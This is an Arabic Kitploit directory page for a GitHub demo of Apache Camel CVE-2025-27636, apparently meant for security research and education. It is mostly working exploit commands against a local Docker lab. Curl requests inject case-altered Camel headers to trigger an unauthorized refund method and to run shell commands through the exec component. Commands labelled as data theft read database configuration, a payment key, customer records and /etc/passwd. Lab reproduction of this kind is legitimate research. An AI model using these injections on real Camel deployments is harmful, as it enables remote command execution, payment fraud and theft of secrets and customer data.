Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-27636-demo — يُوضح ثغرة Apache Camel CVE-2025-27636 مع إعادة إنتاج قائمة على Docker لهجمات حقن الترويسات، بما في ذلك حقن طرق الـ Bean وتنفيذ الأوامر لأغراض البحث والتعليم الأمني. | Kitploit
أدوات/GitHubGitHub/crystallen1/cve-2025-27636-demo
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubcrystallen1/cve-2025-27636-demo

CVE-2025-27636-demo

يُوضح ثغرة Apache Camel CVE-2025-27636 مع إعادة إنتاج قائمة على Docker لهجمات حقن الترويسات، بما في ذلك حقن طرق الـ Bean وتنفيذ الأوامر لأغراض البحث والتعليم الأمني.

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عرض توضيحي لثغرات Apache Camel CVE

يعرض هذا المشروع ثغرات أمنية في Apache Camel تتعلق بهجمات حقن الترويسات (Header Injection).

بناء Docker

قم ببناء صورة Docker:

root@kitploit:~
docker build -t camel-cve-demo .

تشغيل Docker

قم بتشغيل الحاوية مع جميع المنافذ اللازمة:

root@kitploit:~
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo

إعادة إنتاج الهجوم

1. هجوم حقن طريقة الـ Bean

استغلال نقطة النهاية الضعيفة عن طريق حقن أسماء الطرق:

root@kitploit:~
# هجوم ناجح - ترويسة حساسة لحالة الأحرف
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# بديل - حقن عبر معامل الاستعلام
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"

مقارنة (يجب أن تفشل هذه):

root@kitploit:~
# حالة أحرف خاطئة - يجب ألا تعمل
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

2. هجوم تنفيذ الأوامر

استغلال مكوّن exec لتنفيذ أوامر عشوائية:

الاستطلاع:

root@kitploit:~
# التحقق من الدليل الحالي
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# سرد دليل الإعدادات
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# البحث عن ملفات الإعدادات
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"

سرقة البيانات:

root@kitploit:~
# قراءة إعدادات قاعدة البيانات
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# قراءة أسرار الدفع
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# قراءة بيانات العملاء
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# قراءة سجلات التدقيق
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# قراءة مستخدمي النظام
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# سرد العمليات
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"

التحقق من نتائج الهجوم

تحقق من سجلات الهجوم داخل الحاوية:

root@kitploit:~

# عرض محاولات الاسترداد غير المصرح بها
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt

المنافذ

  • 8080: التطبيق الرئيسي (الواجهة الأمامية)
  • 8081: نقطة النهاية الضعيفة لحقن الـ Bean
  • 8484: نقطة النهاية الضعيفة لحقن exec
تنزيل الأداة